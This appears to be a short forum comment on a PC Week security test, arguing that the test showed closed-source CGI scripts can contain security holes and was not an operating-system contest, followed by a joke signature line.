    Why aren't those among us who consider OpenSource the panacea to solve world hunger cheering? This was not set up as an OS vs. OS test, but as a platform-stressing security test. The verdict? Closed source CGI scripts can contain security holes. Isn't this a good thing for PC Week to be talking about?

    Of course, if you insist on declaring this to be an OS vs. OS test, they'll probably take you up on the idea. This also looks like it will be kept up for a while, with that particular bug fixed of course.

    --
    You're special forces then? That's great! I just love your olympics!